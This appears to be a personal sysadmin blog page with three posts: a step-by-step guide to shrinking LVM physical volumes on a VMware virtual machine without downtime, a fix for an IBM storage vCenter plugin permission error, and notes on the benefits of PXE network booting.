Generally you cannot just decrease disk size from the configuration of VM. (Even if there was this possibility, this is fairy not to use. Almost any file system will go crazy with the sudden change like that. In most cases this will lead to the loss of data).

Fortunately, I use LVM for all my servers, mainly for the purpose of extending volumes if needed. This time I had a task to decrease the size of Physical Volumes and make it without a second of downtime.

So, steps was as following:
  • Check your backups
  • Add the virtual hard disks holding in mind the .vmdk sizes as it's specified in VMware KB 1012384.
    Depending on your space assigning policy you can follow the following rules:
    a) add 2 disks of 250GB (in my case) with thin provisioning;
    b) add 1 of 250GB and 1 disk of 10GB. (I use round numbers to simplify the setup)
  • Re-scan scsi bus inside the VM:
# echo "- - -" > /sys/class/scsi_host/host0/scan
  • Create lvm partitions for all the added devices:
# fdisk /dev/sdX
Command (m for help): n
Command action
   e   extended
   p   primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-32635, default 1):
Using default value 1
Last cylinder or +size or +sizeM or +sizeK (1-32635, default 32635):
Using default value 32635

Command (m for help): t
Selected partition 1
Hex code (type L to list codes): 8e
Changed system type of partition 1 to 8e (Linux LVM)

Command (m for help): w
The partition table has been altered!

Calling ioctl() to re-read partition table.
Syncing disks.

  • Extend the Volume Group by adding those new disk

# lvm vgextend VolGroupXX /dev/sdX1 /dev/sdY1
  • Check the number of Physical Extents to migrate

# lvm pvdisplay
  --- Physical volume ---
  PV Name               /dev/sdf1
  VG Name               VolGroupXX
  PV Size               250.00 GiB / not usable 4.69 MiB
  Allocatable           yes
  PE Size               4.00 MiB
  Total PE              63998
  Free PE               63998
  Allocated PE          0
  PV UUID               Zp7uJR-YsIQ-AjRP-hdGL-OXSl-XbJG-N1GFn2
  --- Physical volume ---
  PV Name               /dev/sdg1
  VG Name               VolGroupXX
  PV Size               250.00 GiB / not usable 4.69 MiB
  Allocatable           yes
  PE Size               4.00 MiB
  Total PE              63998
  Free PE               63998
  Allocated PE          0
  PV UUID               eKdiqW-eMjI-ck4a-grM3-ogX3-6BOP-Q1ldlC
  --- Physical volume ---
  PV Name               /dev/sdb1
  VG Name               VolGroupXX
  PV Size               255.99 GiB / not usable 2.72 MiB
  Allocatable           yes (but full)
  PE Size               4.00 MiB
  Total PE              65534
  Free PE               0
  Allocated PE          65534
  PV UUID               PajbnY-65II-Aeyt-WamI-Xzr8-M3b2-kWfy6U

In this example /dev/sdf and /dev/sdg are the new added hard drivse with the size of 250GB, and /dev/sdb is an old one with the size of 256GB. The important part for as is "Total PE". If we call the pvmove command without specifying the amount of Physical Extents to move, we will receive an error.
  • Migrate the Extents to the new hard drives
# lvm pvmove /dev/sdb1:1-63998 /dev/sdf1
# lvm pvmove /dev/sdb1 /dev/sdg1
As you noticed I didn't specify the number of extents to move to the second drive. In fact this command will move only the used ones.
Now, you might extend the Logical Volume to use all the space added
  • Extend the Logical Volume
# lvm lvextend +100%FREE VolGroupXX/LogVolXX

  • extend the partition with the proper file system tools
# <resize2fs|resize_reiserfs|...> /dev/mapper/VolGroupXX-LogVolXX
  • And, finally, remove the old drives
# lvm vgreduse VolGroupXX /dev/sdb1
# lvm pvremove /dev/sdb1

Now you can remove the old drive from the VM configuration... zero downtime.

Well, many of the experienced Linux admins might not find anything new in this article. However, I didn't know how it works till I faced a need of a change like that. For instance, I have extended so many volumes so much times, that this operation (extending) takes about a minute for me (if not count the time spent by the FS extending tool).

IBM DS3000/DS4000/DS5000 vCenter Management plugin issue

Not long ago I have found that IBM have a plugin for their storage for the vCenter. Particularly I was interested to manage DS3400 and DS3524 via vSphere client console, so I've got a plugin from this page.

However, during setup of this plugin I've faced couple of issues.

First of all (this is minor actually, but I've spent 20 minutes to find out what is happening) make sure you've set the free TCP ports for Jetty service. In my case there was a conflict with the vCenter Update service. Common issue, nothing special... however...

Second issue is rather VMware specific, since I found a solution on some page related to another plugin for vCenter. So, the problem is that you have the following error when try to select this plugin in vSphere Client:

User is not authorized to use this plug-in.
Please contact the Administrator and ask for StorageAdmin.readwrite or SorageAdmin.readonly Privileges


However, you are for sure in the group with the full privileges... And actually this is the problem. It turns out that your account should have those privileges apart from any group, set on per-user basis.

So, as workaround, just add a separate permission for your account and restart the vSphere Client.

Sunday 18 December 2011

Advantages of PXE

It's just a note about my positive experience with PXE. Although I was working with it some years ago, but now it became so simple to setup, than it's definitely worth to have it in many cases.

First case is when you have to have some new systems installed pretty often. Of course, if you have to setup more than 5 identical systems it's reasonable to have an image or use some kickstart for example, but in this case it's also useful to have PXE configured to help you with that. But in my work I'm facing a situation when I need to prepare some new system for some special need with different hardware and unique post-install steps.

Second case is when you need some special tools available in simple way. It could be even tools for those mentioned purposes like imaging (Acronis True Image for example). Or (what we use pretty often) is a GParted tool and a BartPE image. Yes, it's not a good idea to give everyone in your network the tools like that, but now it's really easy to protect any item in your PXE boot menu with a password. Of course, the way this function is realized doesn't give you any strong protection, but if the guy is able to find and download a file with the password and decode this password, he will also be able to make his own bootable USB-drive with all the tools he needs. And, of course, I'm not talking about the systems without physical access for the "bad guys".

Also, what I have configured with the PXE, is some Live distributions. For example, I have prepared a special installation of Ubuntu, then have put it on NFS, and configured it to mount the root (/) in a special way: nfs+ramfs=unionfs(aufs). Thus, now I have a Network-Booted system, which is configured just how I need, and which anyone can boot on and configure just how he wants, but no changes are applied to the real image on the network - after reboot the system is clean and ready again.

I will not give any examples of code, since there are a lot of it in the Internet. I've started with this recipe, and then I just migrated it to the CentOS server. Unfortunately, I can't find the recipe with which I have configured unionfs, but I can provide anyone with the examples if needed, or you can just google by the  keywords like "PXE aufs ramfs".